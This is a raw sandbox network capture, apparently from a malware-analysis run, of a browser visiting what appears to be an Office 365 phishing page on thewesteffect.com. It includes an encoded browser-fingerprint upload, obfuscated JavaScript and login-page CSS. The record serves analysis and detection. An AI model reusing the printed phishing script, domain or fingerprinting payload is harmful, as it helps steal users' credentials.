                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                                                                                                                                                                                                            Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74
                                                                                                                                                                                                                                            Data Ascii: nt%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefault
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45
                                                                                                                                                                                                                                            Data Ascii: %22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverE
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32
                                                                                                                                                                                                                                            Data Ascii: nt%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%2
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32
                                                                                                                                                                                                                                            Data Ascii: AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%2
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74
                                                                                                                                                                                                                                            Data Ascii: sOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnat
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d
                                                                                                                                                                                                                                            Data Ascii: 22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElem
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC16384OUTData Raw: 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61
                                                                                                                                                                                                                                            Data Ascii: tyautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistra
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC7964OUTData Raw: 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b
                                                                                                                                                                                                                                            Data Ascii: 22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+createElement%28%29+%7B+%5Bnative+
                                                                                                                                                                                                                                            2024-11-14 12:01:42 UTC208INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:41 GMT
                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            2024-11-14 12:01:42 UTC378INData Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 58 68 4e 56 45 56 35 54 55 52 4a 4d 46 5a 55 54 54 46 4e 56 45 56 34 54 56 52 52 4d 41 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                                                                                                                                                                                                                            Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqRXhNVEV5TURJMFZUTTFNVEV4TVRRMA==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.449747192.254.232.133443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC610OUTGET /n/jsnom.js HTTP/1.1
                                                                                                                                                                                                                                            Host: thewesteffect.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:43 GMT
                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Nov 2024 07:43:41 GMT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Content-Length: 100217
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC7929INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                                                                                                                                                                                            Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 78 2d 77 69 64 74 68 3a 5c 78 32 30 31 30
                                                                                                                                                                                                                                            Data Ascii: 20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x20\x20max-width:\x2010
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35 39 2c 5c 78 32 30 35 39 29 29 3b 5c 78 30 61 5c 78 32 30 5c 78
                                                                                                                                                                                                                                            Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x2059,\x2059));\x0a\x20\x
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                                                                                                                                                            Data Ascii: 0.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                                                                                                                                                            Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\x0a\x20\x20\x20\x20\x
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 6c 61 62 65 6c 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78
                                                                                                                                                                                                                                            Data Ascii: 43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20label\x20{\x0a\x20\x
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e
                                                                                                                                                                                                                                            Data Ascii: \x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20poin
